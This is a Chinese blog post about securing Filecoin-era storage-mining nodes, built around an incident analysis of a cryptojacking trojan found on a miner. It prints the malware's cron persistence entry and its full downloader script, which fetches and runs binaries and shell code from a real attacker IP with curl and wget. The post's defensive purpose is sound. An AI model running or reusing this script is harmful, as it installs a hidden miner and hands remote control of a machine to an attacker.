请选择 进入手机版 | 继续访问电脑版
开启辅助访问
链路首页链路财经目前收录 币种 : 4908 交易所 : 310钱包 : 17 24H 交易量 : $43,403,137,051 总市值 : $245,388,183,835
2019
05/14
16:50
分享
评论

  • 网络安全在互联网公司是非常非常重要的东西,它虽然不能直接创造业务价值,但可以决定一个公司的生死。业务做得再好,遇到严重的安全问题,迅速完蛋。从阿里、腾讯对安全的重金投入就可以得知其重要性。区块链领域就更重要了。一个交易所如果被盗,基本就直接破产了。


    但在存储挖矿领域,这个问题没有多少人重视。我相信在Filecoin正式开挖之前,也不会有太多的 人重视。原因很简单,需要投入,但却不能直接带来利益。大家关注的还是我能挖到多少,对于各种技术细节也并不关心。


    但存储挖矿本身属于一种有风险属性的投资行为。如果不重视网络安全,这种风险就会急剧放大。尤其是在Filecoin之前上线的许多存储链,都要求:每个节点都需要公网IP。此要求会让大量没有网络安全防护的机器直接暴露在公网上面,必定会导致更多的安全问题。直接提供公网IP本身不是一个问题。


    但关键是安全防护工作要能匹配。对矿工来讲,追求的是快速回本,不会像互联网公司和传统企业那样投入大量的成本去搞安全这些事情。从硬件投入就可以看到。对企业业务来讲,几万元的服务器比比皆是,但对矿工来讲,几千块钱的机器都嫌贵。



    昨晚又遇到了一个案例。去掉了一些敏感信息,简单分析一下。希望大家能够引起重视,不要出现投入资金投入精力却是给远方的黑客打工的情况。


    通过运维平台,发现某个节点的CPU利用率异常。在获得相关授权之后,登录该系统。发现存在可疑进程vTtHH。以下是top的输出。(正常的挖矿进程名我隐藏了,用xxx代替。)

    PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
    2083 root 20 0 191992 33760 1220 S 1501 0.2 157845:23 /tmp/vTtHH
    22718 miner 20 0 8072384 1.470g 23104 S 10.6 9.4 3443:17 xxx

    左右滑动查看全篇



    俗话说,人不可貌相。但是一般的程序却可以直接通过名字来判断其到底做了什么事情。木马可以伪装成正常进程的名字,但vTtHH这个名字,一看就知道不是善类,估计是随机生成的。而且这个可执行文件放在/tmp目录下。除了安装程序调用的一些临时程序,一般的程序员不会在/tmp下面放重要的可执行文件。最关键的是,它基本把CPU吃光了。看看它的MD5值:

    #md5sum /tmp/vTtHH
    42483ee317716f87687ddb79fedcb67b /tmp/vTtHH


    Google搜索这个MD5,果然是木马程序。比如,有这篇文章

    https://blog.netlab.360.com/systemdminer-propagation-through-ddg/


    进一步搜索,还可以看到很多相关的讨论

    https://www.v2ex.com/t/560438


    讨论的内容都是最近发布的,看来这是一个新的木马。它是一个恶意挖矿程序,借用机器挖它的矿。你付出了机器成本、电费、网络费用,却是帮别人在打工。



    看看它到底往哪里发数据

    # netstat -anp | grep vTtHH
    tcp 0 104 ***.***.***.***:51200 104.130.210.206:8000 ESTABLISHED 16154/vTtHH

    左右滑动查看全篇

    查询到的IP信息:

    您查询的IP:104.130.210.206
    本站数据:美国 伊利诺斯 芝加哥
    参考数据1:美国伊利诺伊州芝加哥 Managed Dedicated & Cloud Computing Services

    左右滑动查看全篇


    可以想到的是,直接kill这个进程没有什么用处,它又会死灰复燃的。看看定时任务

    # crontab -l
    */15 * * * * (/usr/bin/izxbfa2||/usr/libexec/izxbfa2||/usr/local/bin/izxbfa2||/tmp/izxbfa2||curl -m180 -fsSL http://104.128.230.16:8000/i.sh||wget -q -T180 -O- http://104.128.230.16:8000/i.sh) | sh

    左右滑动查看全篇


    通过它可以找到一堆的可疑文件。怎么清除这些文件可以看以前的文章?


    在没有这些文件的时候,它会从http://104.128.230.16:8000/i.sh下载脚本。


    打开看看这个脚本是什么玩意儿

    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

    mkdir -p /var/spool/cron/crontabs
    echo "" > /var/spool/cron/root
    echo "*/15 * * * * (/usr/bin/iugkfa2||/usr/libexec/iugkfa2||/usr/local/bin/iugkfa2||/tmp/iugkfa2||curl -fsSL -m180 http://104.128.230.16:8000/i.sh||wget -q -T180 -O- http://104.128.230.16:8000/i.sh) | sh" >> /var/spool/cron/root
    cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

    cd /tmp
    touch /usr/local/bin/writeable && cd /usr/local/bin/
    touch /usr/libexec/writeable && cd /usr/libexec/
    touch /usr/bin/writeable && cd /usr/bin/
    rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

    export PATH=$PATH(pwd)
    ps auxf | grep -v grep | grep iugkfa2 || rm -rf iugkfa2
    if [ ! -f "iugkfa2" ]; then
    curl -fsSL -m1800 http://104.128.230.16:8000/static/4002/ddgs.$(uname -m) -o iugkfa2||wget -q -T1800 http://104.128.230.16:8000/static/4002/ddgs.$(uname -m) -O iugkfa2
    fi
    chmod +x iugkfa2
    /usr/bin/iugkfa2||/usr/libexec/iugkfa2||/usr/local/bin/iugkfa2||/tmp/iugkfa2

    ps auxf | grep -v grep | grep iugkbcb | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep iugkbcc | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep iugkbcd | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep iugkbce | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep iugkfa0 | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep iugkfa1 | awk '{print $2}' | xargs kill -9

    echo "*/15 * * * * (/usr/bin/iugkfa2||/usr/libexec/iugkfa2||/usr/local/bin/iugkfa2||/tmp/iugkfa2||curl -m180 -fsSL http://104.128.230.16:8000/i.sh||wget -q -T180 -O- http://104.128.230.16:8000/i.sh) | sh" | crontab -

    左右滑动查看全篇

    通过它来学习bash还是不错的。可惜了这个作者,不务正业。清除了crontab以及相关文件,系统恢复正常。



    下一步就是帮忙分析到底是怎么被入侵的。主要有几种原因

    弱密码。密码一定要强,大写、小写、数字、符号最好都用上。当然,你自己不能忘记。ssh登录最好禁止密码方式,采用密钥登录。


    系统漏洞。好的软件能够防范已知的漏洞,未知的漏洞还得靠运维的不断加强。


    挖矿软件的漏洞。我估计这块是重头戏。许多挖矿软件都对外暴露了很多端口,加大了被入侵的可能性。任何软件都是有Bug的,放在网络里的任何软件都是有漏洞的,只是已知和未知的区别。


    内部人员或者第三方进入机房的人员导致。这种可能性一般较小,本文中的例子更不太像。但很多时候,这也是一个被入侵的手段。


    有一劳永逸永保网络安全的方案吗?没有。应对方法就是一定要熟悉网络安全防护,通过特定的软件和加强的运维来保障系统的安全性。


主题帖 110 关注 0 粉丝 0
情感指数

链路大数据分析置信度 25.92 %

TA的主题帖
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表